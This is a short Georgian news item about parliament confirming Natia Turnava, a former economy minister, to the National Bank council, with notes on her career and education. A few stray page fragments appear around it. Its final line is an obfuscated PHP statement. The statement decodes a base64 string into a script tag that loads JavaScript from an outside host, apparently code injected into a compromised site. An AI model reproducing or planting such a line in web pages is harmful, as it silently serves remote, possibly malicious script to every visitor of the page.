celsiusi
ავერსი შნაიდერი
პარლამენტმა ეროვნული ბანკის საბჭოს წევრის პოზიციაზე ნათია თურნავას კანდიდატურას 80 ხმით 9 წინააღმდეგ მხარი დაუჭირა.
 
ნათია თურნავა 2018 წლის 14 სექტემბრიდან 2019 წლის 17 აპრილამდე ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე, ხოლო 2019 წლის 18 აპრილიდან 2022 წლის 9 თებერვლამდე ამავე უწყების მინისტრი იყო.
 
პარლამენტის მიერ გავრცელებული ინფორმაციის მიხედვით, ეკონომიკის მეცნიერებათა დოქტორსა და ბიზნეს ადმინისტრირების მაგისტრს, ნათია თურნავას განათლება მიღებული აქვს ივანე ჯავახიშვილის სახელობის სახელმწიფო და დიდი ბრიტანეთის კემბრიჯის საგრაფოს უნივერსიტეტებში. ასევე გავლილი აქვს სწავლების სხვადასხვა კურსი აშშ-ში ჰარვარდის უნივერსიტეტის, ჯ. კენედის სახელობის სამთავრობო სკოლის ეგიდით.
 
 
 
 
780
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");